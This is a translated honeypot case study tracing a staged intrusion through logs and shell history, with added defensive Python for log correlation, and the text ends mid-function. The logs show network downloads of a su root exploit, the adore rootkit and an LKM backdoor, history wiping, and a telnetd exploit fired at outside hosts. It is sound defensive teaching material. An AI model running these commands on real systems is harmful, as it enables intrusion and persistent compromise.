A Detailed Analysis of an Intrusion Show

    [Sunny March 10, 2008 13:17 | by ]
Source: Sinbad Security
Lengmo's PS: I came across this article while browsing around the web. It is very old, but I don't think I had seen it before. Having read it, I found it quite interesting: although it is billed as an "intrusion show", many of the intrusion techniques and the thinking behind them are worth learning from, and it is a fairly classic write-up of a Linux intrusion. (Note: a PDF of the document is attached at the end of the article for download.)

1. Background

This article centres on my Linux honeypot, which gives off a sweet scent across the network to lure worms and visitors of every kind. To make a honeypot more attractive, some preparation is needed. There was a discussion about this on a mailing list recently: someone said a friend of his had posted a honeypot's IP address in a hacker IRC channel; a group of Romanian hackers broke in, discovered that it was a honeypot with every action fully recorded, got angry, and retaliated with a distributed denial-of-service attack that paralysed the neighbouring network for a month. So luring intruders takes some finesse. Last month I chatted with a friend about my approach: create an ordinary user account with the password equal to the username, log in with that account on the console and leave it sitting idle, and make sure the system has the finger service enabled. Old-school intruders still have a soft spot for finger: they hope to finger a pile of usernames, then guess simple passwords to get into the system, expecting that this sets them apart from the formidable younger generation of script kiddies. I never expected my friend to have such a good memory: a month later, without my sending an invitation, he found the honeypot with practised ease and logged in with that ordinary account. Knowing full well that this is a honeypot and that every action is monitored and recorded, yet still trying to get root locally, install backdoors and use the machine as a stepping stone to attack others, is that not putting on a performance on stage for the audience to enjoy? That is where the term "intrusion show" comes from.
Let us now watch the performance together. The material comes mainly from the system logs and command history collected by the log server, plus the session transcripts recorded by Snort. Some of it has been trimmed to save space and protect privacy. I hope readers will each take something away from it from their own angle.

2. Scanning

One Saturday afternoon, Snort raised an alert about a SuperScan scan from 202.X.X.X, which sent an ICMP Echo packet to test whether the system was alive:
2004-9-21 16:48 snort[1852]: [1:474:1] ICMP superscan echo [Classification: Attempted Information Leak] [Priority: 2]: {ICMP} 202.X.X.X -> 10.0.0.1

At the same time, the system log recorded the port probing that followed:
2004-9-21 16:48 in.rlogind[1316]: connect from 210.X.X.X
2004-9-21 16:48 inetd[413]: pid 1318: exit status 1
2004-9-21 16:48 in.rshd[1318]: connect from 210.X.X.X
2004-9-21 16:48 in.fingerd[1315]: connect from 210.X.X.X
2004-9-21 16:48 in.telnetd[1313]: connect from 210.X.X.X
2004-9-21 16:48 rshd[1318]: Connection from 210.X.X.X on illegal port
2004-9-21 16:48 telnetd[1313]: ttloop: peer died: EOF
2004-9-21 16:48 inetd[413]: pid 1316: exit status 1
2004-9-21 16:48 inetd[413]: pid 1313: exit status 1
2004-9-21 16:48 sendmail[1314]: NOQUEUE: Null connection from [210.X.X.X]
2004-9-21 16:48 in.fingerd[1319]: connect from 210.X.X.X
2004-9-21 16:48 in.telnetd[1320]: connect from 210.X.X.X

Notice that the source address of these port connections is not 202.X.X.X, which sent the ICMP Echo, but 210.X.X.X. Clearly my friend was using a TCP/UDP proxy as a stepping stone, and since that proxy does not support ICMP, his real IP address was exposed as well. :P
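As an added illustration of the correlation the author did by eye here (this is my example code, not part of the original article), the Python below pairs each Snort ICMP alert with the inetd connection and login lines that follow it within a time window and flags any TCP source that differs from the ICMP source. The log lines are constructed to match the formats quoted above; the ten-minute window and the regular expressions are my assumptions.

```python
import re
from datetime import datetime

# Constructed sample, modelled on the Snort and inetd log formats quoted in this
# article (addresses are the article's own masked placeholders, not real hosts).
SAMPLE_LOG = """\
2004-9-21 16:48 snort[1852]: [1:474:1] ICMP superscan echo [Classification: Attempted Information Leak] [Priority: 2]: {ICMP} 202.X.X.X -> 10.0.0.1
2004-9-21 16:48 in.rlogind[1316]: connect from 210.X.X.X
2004-9-21 16:48 in.rshd[1318]: connect from 210.X.X.X
2004-9-21 16:48 in.fingerd[1315]: connect from 210.X.X.X
2004-9-21 16:48 in.telnetd[1313]: connect from 210.X.X.X
2004-9-21 16:48 sendmail[1314]: NOQUEUE: Null connection from [210.X.X.X]
2004-9-21 16:52 login: LOGIN ON 1 BY tom FROM 210.X.X.X
"""

LINE_RE = re.compile(r"^(\d{4}-\d{1,2}-\d{1,2} \d{1,2}:\d{2}) (.*)$")
ICMP_RE = re.compile(r"\{ICMP\} (\S+) -> (\S+)")
CONNECT_RE = re.compile(r"\b(?:connect from|connection from) \[?([^\s\]]+)\]?")
LOGIN_RE = re.compile(r"LOGIN ON \S+ BY \S+ FROM (\S+)")


def parse_events(log_text):
    """Reduce each log line to (timestamp, kind, source), where kind is one of
    icmp (Snort ICMP alert), login, or tcp (inetd/sendmail connection)."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m.group(1), "%Y-%m-%d %H:%M")
        body = m.group(2)
        if (im := ICMP_RE.search(body)):
            events.append((ts, "icmp", im.group(1)))
        elif (lm := LOGIN_RE.search(body)):
            events.append((ts, "login", lm.group(1)))
        elif (cm := CONNECT_RE.search(body)):
            events.append((ts, "tcp", cm.group(1)))
    return events


def find_pivot_mismatches(log_text, window_minutes=10):
    """For every ICMP probe, collect the sources of TCP connections and logins
    that follow it within the window. A TCP source that differs from the ICMP
    source is the pattern the article describes: the TCP traffic goes through a
    proxy that does not forward ICMP, so the ping reveals a different address."""
    events = parse_events(log_text)
    findings = []
    for ts, kind, src in events:
        if kind != "icmp":
            continue
        follow = [e for e in events
                  if e[1] in ("tcp", "login")
                  and 0 <= (e[0] - ts).total_seconds() <= window_minutes * 60]
        other = sorted({e[2] for e in follow if e[2] != src})
        if other:
            findings.append({"icmp_src": src, "tcp_srcs": other, "follow_ups": len(follow)})
    return findings


if __name__ == "__main__":
    for f in find_pivot_mismatches(SAMPLE_LOG):
        print(f"ICMP from {f['icmp_src']} but {f['follow_ups']} TCP events from {f['tcp_srcs']}")
```

Run it and the single finding pairs the 202.X.X.X ping with six follow-up events from 210.X.X.X; a scan whose ICMP and TCP sources agree produces nothing, so the check is quiet on an ordinary unproxied scanner.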

3. Local Privilege Escalation Attempt

He logged in easily with my decoy account tom, succeeding on the first try, as if walking into his own home:
2004-9-21 16:52 login: LOGIN ON 1 BY tom FROM 210.X.X.X
2004-9-21 16:52 PAM_pwdb[1321]: (login) session opened for user tom by(uid=0)

He transferred a local privilege escalation script into the system using cat redirection plus paste. Note the time gap: his rummaging around took 4 minutes:
2004-9-21 16:52 -bash: HISTORY: PID=1322 UID=500 ls
2004-9-21 16:52 -bash: HISTORY: PID=1322 UID=500 w
2004-9-21 16:52 -bash: HISTORY: PID=1322 UID=500 pwd
2004-9-21 16:52 -bash: HISTORY: PID=1322 UID=500 cd ..
2004-9-21 16:52 -bash: HISTORY: PID=1322 UID=500 ls
2004-9-21 16:56 -bash: HISTORY: PID=1322 UID=500 cd tom
2004-9-21 16:56 -bash: HISTORY: PID=1322 UID=500 cat > 1.sh
2004-9-21 16:56 -bash: HISTORY: PID=1322 UID=500 chmod 755 1.sh
2004-9-21 16:56 -bash: HISTORY: PID=1322 UID=500 ./1.sh
2004-9-21 16:58 -bash: HISTORY: PID=1322 UID=500 ls
  
And the result of running ./1.sh? Examining the Snort SESSION recording shows that it failed because the system lacked the relevant library file. Note that in the recording every character of the typed commands appears twice: this is the terminal echo, and Snort faithfully recorded both directions:
[tom@abc tom]$ ..//11..sshh
+-----------------------------------------------------------+
| Linux kernel 2.2.X (X<=15) & sendmail <= 8.10.1 |
| local root exploit |
| |
| Bugs found and exploit wr#tten by Wojciech Purczynski |
| wp@elzabsoft.pl cliph/ircnet Vooyec/dalnet |
+-----------------------------------------------------------+
Creating temporary directory
Creating anti-noexec library (capdrop.c)
Compiling anti-noexec library (capdrop.so)
Creating suid shell (sush.c)
Compiling suid shell (sush.c)
Creating shell script
Creating own sm.cf
Dropping CAP_SETUID and calling sendmail
/bin/true: error in loading shared libraries: /tmp/foo/capdrop.s cannot open shared object file:
No such file or directory
Waiting for suid shell (/tmp/sush)
[tom@abc tom]$ llss
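The doubled characters make Snort session captures hard to read, and a naive fix (drop every repeated character) breaks as soon as keystrokes and echoes interleave at word granularity, as in the `ccd d ~~ttomom` seen later in this article. The Python below is an added example, not the article's own tooling: `collapse_echo` handles the simple case, and `is_double_echo` checks whether a captured line is exactly an interleaving of two copies of a candidate command taken from the bash HISTORY log, which is the reliable way to reconcile the two sources. The sample strings are taken from the transcripts quoted in this article; the function names are mine.

```python
def collapse_echo(session: str) -> str:
    """Greedy de-echo for the common case where each typed character is
    immediately followed by its echo, e.g. "..//11..sshh" -> "./1.sh".
    It is wrong whenever keystrokes and echoes interleave at word granularity
    ("ccd d ~~ttomom"), which is why is_double_echo exists."""
    out = []
    i = 0
    while i < len(session):
        out.append(session[i])
        # skip the echo if the next character repeats this one
        i += 2 if i + 1 < len(session) and session[i + 1] == session[i] else 1
    return "".join(out)


def is_double_echo(session: str, command: str) -> bool:
    """True if session is an interleaving of two copies of command, which is
    what a bidirectional capture of a telnet session looks like (client
    keystrokes plus server echo). Standard O(n^2) interleaving DP."""
    n = len(command)
    if len(session) != 2 * n:
        return False
    # dp[i][j]: session[:i+j] can be built from command[:i] (copy A)
    # and command[:j] (copy B)
    dp = [[False] * (n + 1) for _ in range(n + 1)]
    dp[0][0] = True
    for i in range(n + 1):
        for j in range(n + 1):
            if i == 0 and j == 0:
                continue
            ch = session[i + j - 1]
            from_a = i > 0 and dp[i - 1][j] and command[i - 1] == ch
            from_b = j > 0 and dp[i][j - 1] and command[j - 1] == ch
            dp[i][j] = from_a or from_b
    return dp[n][n]


def match_history(session_line: str, history_commands) -> list:
    """Return the commands from the shell history log that the echoed session
    line (prompt already stripped) can be reconciled with."""
    return [c for c in history_commands if is_double_echo(session_line, c)]


if __name__ == "__main__":
    # Sample strings taken from the transcripts quoted in this article.
    print(collapse_echo("..//11..sshh"))                       # ./1.sh
    print(match_history("..//11..sshh", ["ls", "./1.sh", "chmod 755 1.sh"]))
    print(is_double_echo("ssuunnxkxkddooroor", "sunxkdoor"))   # True
```

The check also tells you when the capture itself is lossy: the article's `ggcccc - -oo ssuu susu..cc` is two characters short of a full double echo of `gcc -o su su.c`, so `is_double_echo` rejects it, and the history log rather than the session should be treated as authoritative for that command.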

The first attempt failed; he deleted 1.sh and left a "XXXX was here" signature. Fine, now I know who did it :)
2004-9-21 16:58 -bash: HISTORY: PID=1322 UID=500 rm -rf 1.sh
2004-9-21 16:58 -bash: HISTORY: PID=1322 UID=500 echo haha shi wo XXXX > haha.txt

My friend then started wandering around, apparently without much to show for it:
2004-9-21 16:59 -bash: HISTORY: PID=1322 UID=500 cd /tmp
2004-9-21 16:59 -bash: HISTORY: PID=1322 UID=500 ls
2004-9-21 16:59 -bash: HISTORY: PID=1322 UID=500 cd foo
2004-9-21 16:59 -bash: HISTORY: PID=1322 UID=500 ls
Sinbad Technical Publications Page 4
2004-9-21 16:59 -bash: HISTORY: PID=1322 UID=500 cd ..
2004-9-21 16:59 -bash: HISTORY: PID=1322 UID=500 ls -al
2004-9-21 16:59 -bash: HISTORY: PID=1322 UID=500 cd .font-unix
2004-9-21 16:59 -bash: HISTORY: PID=1322 UID=500 ls
2004-9-21 16:59 -bash: HISTORY: PID=1322 UID=500 cd fs-1
2004-9-21 16:59 -bash: HISTORY: PID=1322 UID=500 ls
2004-9-21 16:59 -bash: HISTORY: PID=1322 UID=500 cd fs-1
2004-9-21 17:00 -bash: HISTORY: PID=1322 UID=500 ls -al
2004-9-21 17:00 -bash: HISTORY: PID=1322 UID=500 cd /
2004-9-21 17:00 -bash: HISTORY: PID=1322 UID=500 ls
2004-9-21 17:00 -bash: HISTORY: PID=1322 UID=500 cd home
2004-9-21 17:00 -bash: HISTORY: PID=1322 UID=500 ls
2004-9-21 17:00 -bash: HISTORY: PID=1322 UID=500 cd ftp
2004-9-21 17:00 -bash: HISTORY: PID=1322 UID=500 ls
2004-9-21 17:00 -bash: HISTORY: PID=1322 UID=500 ls
2004-9-21 17:00 -bash: HISTORY: PID=1322 UID=500 cd /
2004-9-21 17:00 -bash: HISTORY: PID=1322 UID=500 ls
2004-9-21 17:01 -bash: HISTORY: PID=1322 UID=500 ps -ef


4. Second Local Privilege Escalation Attempt

He switched to a different local privilege escalation program, compiled it, and then immediately deleted it?
2004-9-21 17:05 -bash: HISTORY: PID=1322 UID=500 cd ~tom
2004-9-21 17:05 -bash: HISTORY: PID=1322 UID=500 cat > su.c
2004-9-21 17:05 -bash: HISTORY: PID=1322 UID=500 gcc -o su su.c
2004-9-21 17:05 -bash: HISTORY: PID=1322 UID=500 ls
2004-9-21 17:06 -bash: HISTORY: PID=1322 UID=500 rm -rf su.c

It turned out that compilation had failed: some characters in the source were mangled while being pasted through cat redirection:
[tom@abc tom]$ ggcccc - -oo ssuu susu..cc
su.c:101: unterminated character constant

He tried another way: open a new file in vi and paste into it:
2004-9-21 17:06 -bash: HISTORY: PID=1322 UID=500 vi su.c
2004-9-21 17:07 -bash: HISTORY: PID=1322 UID=500 gcc -o su su.c

This time the result was even worse, with three errors. We also notice that the recorded input contains lots of [A and [D characters: these are the cursor keys being used to recall the history command "gcc -o su su.c" he had just typed. He is lazy enough :P
[tom@abc tom]$ [Avi su.c[A[D[D[D[D[D[D[D[4@rm -rf su.c[A[D[D[D[D[D[D[D[D[D[D[Dls[K[A[D[Dgcc -o su su.c
su.c:107: unterminated character constant
su.c:523: unterminated string or character constant
su.c:130: possible real start of unterminated constant

He left another message, "I'll come back to it when I have time", and left. It was past 5 on a weekend afternoon; he probably had plans:
2004-9-21 17:09 -bash: HISTORY: PID=1322 UID=500 ls
2004-9-21 17:10 -bash: HISTORY: PID=1322 UID=500 rm -rf *.c
2004-9-21 17:10 -bash: HISTORY: PID=1322 UID=500 echo kao,yihou you kong zai gao >> haha.txt
2004-9-21 17:11 -bash: HISTORY: PID=1322 UID=500 w
2004-9-21 17:11 -bash: HISTORY: PID=1322 UID=500 ls -al
2004-9-21 17:11 -bash: HISTORY: PID=1322 UID=500 cat .bash_history
2004-9-21 17:13 -bash: HISTORY: PID=1322 UID=500 cat /etc/passwd
2004-9-21 17:16 -bash: HISTORY: PID=1322 UID=500 exit


5. Third Local Privilege Escalation Attempt

Two days later my friend came back. It was a Monday afternoon, during working hours, so apparently his job is not very busy. That is the common trait of the "box hacking" crowd: plenty of time and energy.
2004-9-23 13:28 in.telnetd[5567]: connect from 210.X.X.X
2004-9-23 13:28 PAM_pwdb[5568]: (login) session opened for user tom by(uid=0)
2004-9-23 13:28 login: LOGIN ON 1 BY tom FROM 210.X.X.X

This time he had learned his lesson and tried to download directly from the web with wget, but my system apparently did not have wget installed, or PATH was wrong. In the end he switched to lynx with the -dump option and successfully downloaded su.c, a privilege escalation program targeting /bin/su, from a domestic mirror of hack.co.za. He compiled and ran it and finally obtained local root:
2004-9-23 13:29 -bash: HISTORY: PID=5569 UID=500 w
2004-9-23 13:29 -bash: HISTORY: PID=5569 UID=500 ps -ef
2004-9-23 13:32 -bash: HISTORY: PID=5569 UID=500 wget http://www.safechina.net/www_hack_co_za/redhat/5.1/su.c
2004-9-23 13:34 -bash: HISTORY: PID=5569 UID=500 lynx
2004-9-23 13:35 -bash: HISTORY: PID=5569 UID=500 lynx -dump http://www.safechina.net/www_hack_co_za/redhat/5.1/su.c > su.c
2004-9-23 13:35 -bash: HISTORY: PID=5569 UID=500 gcc -o su su.c
2004-9-23 13:35 -bash: HISTORY: PID=5569 UID=500 ./su
su exploit by XP <xp@xtreme-power.com>
Enjoy!
Phase 1. Checking paths and write permisions
Checking for /usr/bin/msgfmt...Ok
Checking for /usr/bin/objdump...Ok
Checking write permisions on /tmp...Ok
Checking read permisions on /bin/su...Ok
Checking for a valid language... [using af_ZA] Ok
Checking that /tmp/LC_MESSAGES does not exist...Ok
Phase 2. Calculating eat and pad values
......................................................................done
eat = 120 and pad = 2
Phase 3. Creating evil libc.mo and setting enviroment
vars
Phase 4. Getting address of .dtors section of /bin/su
..........................................done
.dtors is at 0x0804bd3c
Phase 5. Compiling suid shell
/tmp/xp created Ok
Phase 6. Executing /bin/su
- Entering rootshell ;-) -
sh-2.03# iid

Snort also raised an alert that he had obtained root:
2004-9-23 13:37 snort[1852]: [1:498:3] ATTACK RESPONSES id check returned root [Classification:
Potentially Bad Traffic] [Priority: 2]: {TCP} 10.0.0.1:23 -> 210.x.x.x:4560


6. Installing Backdoors

After gaining full privileges, my friend started downloading the adore rootkit and a backdoor program called sunxkdoor:
2004-9-23 13:39 sh: HISTORY: PID=7046 UID=0 lynx -dump http://stealth.7350.org/rootkits/adore-0.52.tgz > 1.tgz
2004-9-23 13:47 sh: HISTORY: PID=7046 UID=0 lynx -dump http://www.sunx.org/mysoft/sunxkdoor.tar > 1.tar

But this failed again: both redirected files were 0 bytes, because lynx does not work properly in the shell obtained through the exploit:
sh-2.03# lynx -dump http://stealth.7350.org/rootkits/adore-0.52.tgz >> 1.tgz
Your terminal lacks the ability to clear the screen or position the cursor.
sh-2.03# llyynnxx --dduummpp http:h//www.sunx.org/mysoft/sunxkdoor.tarttp://www.sunx.org/mysoft/sunxkdoor.tar >> 11..ttarar
Your terminal lacks the ability to clear the screen or position the cursor.
sh-2.03# lls s-a l
-al
total 4
drwxr-xr-x 2 tom tom 1024 Sep 22 21:43 .
drwxrwxrwt 5 root root 1024 Sep 22 21:35 ..
-rw-rw-r-- 1 root root 0 Sep 22 21:43 1.tar
-rw-rw-r-- 1 root root 0 Sep 22 21:37 1.tgz
-rw-rw-r-- 1 root root 0 Sep 22 21:37 adore.tgz
-rwxrwxrwx 1 tom tom 458 Sep 22 21:35 libc.mo
-rw-rw-r-- 1 tom tom 428 Sep 22 21:35 libc.po
sh-2.03# rrm m --rrff **

After several failures he exited the root shell back to the normal terminal and used lynx to download, successfully this time, telnetd.c, an exploit against the telnet daemon, saved as 1.c; the adore rootkit, saved as 1.tgz; and the sunxkdoor backdoor, saved as 2.tar:
sh-2.03# eexxiitt
exit
Phase 7. Cleaning enviroment
rm: cannot unlink `/tmp/xp': Operation not permitted
2004-9-23 14:03 -bash: HISTORY: PID=5569 UID=500 lynx -dump http://www.linux-secure.net/pliki/exploits/telnetd/telnetd.c > 1.c
2004-9-23 14:04 -bash: HISTORY: PID=5569 UID=500 lynx -dump http://stealth.7350.org/rootkits/adore-0.52.tgz> 1.tgz
2004-9-23 14:04 -bash: HISTORY: PID=5569 UID=500 ls -al
2004-9-23 14:05 -bash: HISTORY: PID=5569 UID=500 tar zxfv 1.tgz
2004-9-23 14:05 -bash: HISTORY: PID=5569 UID=500 cd adore
2004-9-23 14:05 -bash: HISTORY: PID=5569 UID=500 ls
2004-9-23 14:05 -bash: HISTORY: PID=5569 UID=500 ./configure
2004-9-23 14:05 -bash: HISTORY: PID=5569 UID=500 make
2004-9-23 14:06 -bash: HISTORY: PID=5569 UID=500 ls
2004-9-23 14:07 -bash: HISTORY: PID=5569 UID=500 cd ..
2004-9-23 14:08 -bash: HISTORY: PID=5569 UID=500 lynx -dump http://www.sunx.org/mysoft/sunxkdoor.tar > 2.tar
2004-9-23 14:08 -bash: HISTORY: PID=5569 UID=500 ls -al
2004-9-23 14:08 -bash: HISTORY: PID=5569 UID=500 export HISTFILE=/dev/null

Next he installed sunxkdoor, an LKM backdoor, which requires root. He ran the su exploit again to get a root shell, loaded sunxkdoor with insmod, then logged out and came back in through the backdoor, bypassing the login process. The backdoor appears to hook the original /bin/login call: first telnet to the system and enter the trigger string sunxkdoor at the login: prompt, and the system drops the connection; then telnet again and you get root's # prompt directly. Note that he moved all three downloaded backdoor programs into a new directory TOM under tom's home directory.
2004-9-23 14:08 -bash: HISTORY: PID=5569 UID=500 ./su
2004-9-23 14:10 sh: HISTORY: PID=8570 UID=0 pwd
2004-9-23 14:10 sh: HISTORY: PID=8570 UID=0 cd ~tom
2004-9-23 14:10 sh: HISTORY: PID=8570 UID=0 ls
2004-9-23 14:10 sh: HISTORY: PID=8570 UID=0 tar xfv 2.tar
2004-9-23 14:10 sh: HISTORY: PID=8570 UID=0 export HISTFILE=/dev/null
2004-9-23 14:12 sh: HISTORY: PID=8570 UID=0 cd sunxkdoor
2004-9-23 14:12 sh: HISTORY: PID=8570 UID=0 ls
2004-9-23 14:13 sh: HISTORY: PID=8570 UID=0 gcc -O2 -c sunxknlsh_linux_II.c
2004-9-23 14:13 sh: HISTORY: PID=8570 UID=0 ls
2004-9-23 14:14 sh: HISTORY: PID=8570 UID=0 mv sunxknlsh_linux_II.o ../sun.o
2004-9-23 14:14 sh: HISTORY: PID=8570 UID=0 cd ..
2004-9-23 14:14 sh: HISTORY: PID=8570 UID=0 ls
2004-9-23 14:14 sh: HISTORY: PID=8570 UID=0 w
2004-9-23 14:14 sh: HISTORY: PID=8570 UID=0 rm -rf sunxkdoor
2004-9-23 14:15 sh: HISTORY: PID=8570 UID=0 ls
2004-9-23 14:15 sh: HISTORY: PID=8570 UID=0 mkdir TOM
2004-9-23 14:15 sh: HISTORY: PID=8570 UID=0 mv * TOM
2004-9-23 14:15 sh: HISTORY: PID=8570 UID=0 ls
2004-9-23 14:15 sh: HISTORY: PID=8570 UID=0 cd TOM
2004-9-23 14:15 sh: HISTORY: PID=8570 UID=0 ls
2004-9-23 14:16 sh: HISTORY: PID=8570 UID=0 insmod
2004-9-23 14:16 sh: HISTORY: PID=8570 UID=0 whereis insmod
2004-9-23 14:17 sh: HISTORY: PID=8570 UID=0 /sbin/insmod sun.o
2004-9-23 14:17 sh: HISTORY: PID=8570 UID=0 /sbin/lsmod
2004-9-23 14:17 sh: HISTORY: PID=8570 UID=0 exit
2004-9-23 14:17 -bash: HISTORY: PID=5569 UID=500 exit
2004-9-23 14:17 PAM_pwdb[5568]: (login) session closed for user tom
#'!
Red Hat Linux release 6.2 (Zoot)
Kernel 2.2.14-5.0 on an i686
login: ssuunnxkxkddooroor
#'!
Red Hat Linux release 6.2 (Zoot)
Kernel 2.2.14-5.0 on an i686
[root@abc /]# ccd d ~~ttomom
[root@abc tom]# llss

TOM
Next he installed adore. The build was missing a header file, but my friend managed to find it in the Linux kernel source tree, copy it into the adore directory, and build adore. After starting adore he used the ava tool to hide the TOM directory; although it reported hidden, the directory was still visible with ls. My friend was quite frustrated; perhaps the two LKMs, adore and sunxkdoor, conflict with each other.
2004-9-23 14:23 login: HISTORY: PID=8620 UID=0 cd TOM
2004-9-23 14:23 login: HISTORY: PID=8260 UID=0 tar zxfv 1.tgz
2004-9-23 14:23 login: HISTORY: PID=8260 UID=0 cd adore
2004-9-23 14:23 login: HISTORY: PID=8260 UID=0 ls
2004-9-23 14:23 login: HISTORY: PID=8260 UID=0 ./configure
2004-9-23 14:23 login: HISTORY: PID=8260 UID=0 make
2004-9-23 14:23 login: HISTORY: PID=8620 UID=0 find / -name spinlock.h
2004-9-23 14:24 login: HISTORY: PID=8620 UID=0 cp /usr/src/linux-2.2.14/include/asm-i386/spinlock.h .
2004-9-23 14:24 login: HISTORY: PID=8620 UID=0 make
2004-9-23 14:24 login: HISTORY: PID=8620 UID=0 ls
2004-9-23 14:25 login: HISTORY: PID=8620 UID=0 mv *.o ../
2004-9-23 14:25 login: HISTORY: PID=8620 UID=0 ls
2004-9-23 14:25 login: HISTORY: PID=8620 UID=0 mv ava ../
2004-9-23 14:26 login: HISTORY: PID=8620 UID=0 mv startadore ../
2004-9-23 14:26 login: HISTORY: PID=8620 UID=0 ls
2004-9-23 14:26 login: HISTORY: PID=8620 UID=0 cd ..
2004-9-23 14:26 login: HISTORY: PID=8620 UID=0 ls
2004-9-23 14:26 login: HISTORY: PID=8620 UID=0 rm -rf adore
2004-9-23 14:26 login: HISTORY: PID=8620 UID=0 vi startadore
2004-9-23 14:29 login: HISTORY: PID=8620 UID=0 ls
2004-9-23 14:29 login: HISTORY: PID=8620 UID=0 insmod
2004-9-23 14:29 login: HISTORY: PID=8620 UID=0 ./startadore
2004-9-23 14:30 login: HISTORY: PID=8620 UID=0 mv startadore start
2004-9-23 14:30 login: HISTORY: PID=8620 UID=0 ./ava
2004-9-23 14:30 login: HISTORY: PID=8620 UID=0 ./ava h ..TOM
2004-9-23 14:30 login: HISTORY: PID=8620 UID=0 ./ava h ../TOM
2004-9-23 14:30 login: HISTORY: PID=8620 UID=0 cd ..
2004-9-23 14:30 login: HISTORY: PID=8620 UID=0 ls


7. Using the Honeypot as a Stepping Stone to Attack Others

Having failed to hide the directory with adore, my friend suddenly remembered that he had downloaded a remote telnetd overflow exploit earlier. He compiled it, saved it as 1, and began experimenting: first against the local machine, then against other hosts on the public Internet. In theory a honeypot should restrict outbound connections, for instance the number of connections at any one time, to prevent someone from installing a distributed denial-of-service program on it and using it to attack other machines, which causes unnecessary trouble. My honeypot had no such restriction, because I spend time every day watching the stories unfold inside her and know them like the back of my hand :)
2004-9-23 14:50 login: HISTORY: PID=8699 UID=0 ./1 -h 127.0.0.1
2004-9-23 14:50 in.telnetd[8774]: connect from 127.0.0.1
2004-9-23 14:50 telnetd[8774]: ttloop: peer died: EOF
2004-9-23 14:56 login: HISTORY: PID=8699 UID=0 ./1 -h 211.xxx.xxx.230 -t 5
2004-9-23 14:58 login: HISTORY: PID=8699 UID=0 ./1 -h 211.xxx.xxx.230
2004-9-23 14:59 inetd[8783]: 2222/tcp: bind: Address already in use
2004-9-23 14:59 inetd[8783]: extra conf for service 2222/tcp (skipped)
2004-9-23 15:10 inetd[8783]: 2222/tcp: bind: Address already in use
2004-9-23 15:10 login: HISTORY: PID=8699 UID=0 ./1 -h 211.xxx.xxx.96 -t 5
2004-9-23 15:10 inetd[8793]: 2222/tcp: bind: Address already in use
2004-9-23 15:10 inetd[8793]: extra conf for service 2222/tcp (skipped)
2004-9-23 15:11 login: HISTORY: PID=8699 UID=0 ./1 -h 211.xxx.xxx.106 -t 5
2004-9-23 15:11 inetd[8793]: extra conf for service 2222/tcp (skipped)
2004-9-23 15:12 inetd[8796]: extra conf for service 2222/tcp (skipped)
2004-9-23 15:12 inetd[8796]: 2222/tcp: bind: Address already in use
2004-9-23 15:14 last message repeated 2 times
2004-9-23 15:14 login: HISTORY: PID=8699 UID=0 ./1 -h 211.xxx.xxx.186 -t 3
2004-9-23 15:15 inetd[8799]: 2222/tcp: bind: Address already in use
2004-9-23 15:15 inetd[8799]: extra conf for service 2222/tcp (skipped)
2004-9-23 15:15 snort[1852]: [1:648:5] SHELLCODE x86 NOOP [Classification: Executable
code was detected] [Priority: 1]: {TCP} 211.xxx.xxx.186:23 -> 10.0.0.1:1053
2004-9-23 15:17 last message repeated 3 times
2004-9-23 15:17 login: HISTORY: PID=8699 UID=0 ./1 -h 211.xxx.xxx.25 -t 4
2004-9-23 15:17 inetd[8804]: extra conf for service 2222/tcp (skipped)
2004-9-23 15:17 inetd[8804]: 2222/tcp: bind: Address already in use
2004-9-23 15:18 last message repeated 4 times
2004-9-23 15:18 login: HISTORY: PID=8699 UID=0 ./1 -h 211.xxx.xxx.16 -t 5
2004-9-23 15:19 login: HISTORY: PID=8699 UID=0 ./1 -h 211.xxx.xxx.16 -t 5
2004-9-23 15:19 login: HISTORY: PID=8699 UID=0 ./1 -h 211.xxx.xxx.15 -t 5
2004-9-23 15:20 login: HISTORY: PID=8699 UID=0 ./1 -h 211.xxx.xxx.226 -t 4

I did not pay much attention to the results of this overflow exploit here; I only noticed that the system generated a large number of identical log entries, all occurring after ./1 was run:
2004-9-23 15:20 inetd[8810]: 2222/tcp: bind: Address already in use

On inspection, it turned out that a root shell had been opened on port tcp/2222! This exploit is quite feature-rich; it even binds a shell on its own machine :P Then I got on MSN and contacted that friend; he said he was planning to end the performance, so I started killing off that damned telnetd exploit and repairing the battered honeypot to bring her back online. At the same time I backed up the intrusion log files, keeping a hold on him for future blackmail. :)
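A defender reading the same syslog could have spotted the bind shell from the inetd messages alone. The Python below is an added example (not from the article) that counts inetd bind failures and `extra conf for service` warnings per port, credits syslog's `last message repeated N times` compression to the preceding message, and reports any port that is not in the honeypot's expected service list. The sample lines are constructed from the entries quoted above; the expected-port set is my assumption about what the honeypot's inetd.conf serves.

```python
import re
from collections import defaultdict

# Constructed sample, modelled on the inetd/syslog lines quoted in this article.
SAMPLE_INETD_LOG = """\
2004-9-23 14:59 inetd[8783]: 2222/tcp: bind: Address already in use
2004-9-23 14:59 inetd[8783]: extra conf for service 2222/tcp (skipped)
2004-9-23 15:10 inetd[8783]: 2222/tcp: bind: Address already in use
2004-9-23 15:12 inetd[8796]: 2222/tcp: bind: Address already in use
2004-9-23 15:14 last message repeated 2 times
2004-9-23 15:15 in.telnetd[8800]: connect from 127.0.0.1
2004-9-23 15:16 last message repeated 3 times
2004-9-23 15:17 inetd[8804]: 23/tcp: bind: Address already in use
"""

# Assumption: the services the honeypot's inetd.conf is meant to offer.
EXPECTED_PORTS = {"23/tcp", "25/tcp", "79/tcp", "513/tcp", "514/tcp"}

BIND_FAIL_RE = re.compile(r"inetd\[\d+\]: (\d+/(?:tcp|udp)): bind: ")
EXTRA_CONF_RE = re.compile(r"inetd\[\d+\]: extra conf for service (\d+/(?:tcp|udp))")
REPEAT_RE = re.compile(r"last message repeated (\d+) times")


def count_inetd_events(log_text):
    """Per-port counts of inetd bind failures and duplicate-config warnings.
    syslog collapses identical consecutive messages into "last message repeated
    N times", so that line must be credited to whatever message preceded it."""
    counts = defaultdict(lambda: {"bind_failures": 0, "extra_conf": 0})
    last = None  # (port, kind) of the previous counted line, or None
    for line in log_text.splitlines():
        if m := BIND_FAIL_RE.search(line):
            last = (m.group(1), "bind_failures")
            counts[last[0]][last[1]] += 1
        elif m := EXTRA_CONF_RE.search(line):
            last = (m.group(1), "extra_conf")
            counts[last[0]][last[1]] += 1
        elif m := REPEAT_RE.search(line):
            if last is not None:
                counts[last[0]][last[1]] += int(m.group(1))
        else:
            last = None  # a later "repeated" line belongs to an unrelated message
    return dict(counts)


def audit_inetd_ports(log_text, expected_ports):
    """Return only the ports inetd complained about that are not in the
    expected service list: something else is already listening there."""
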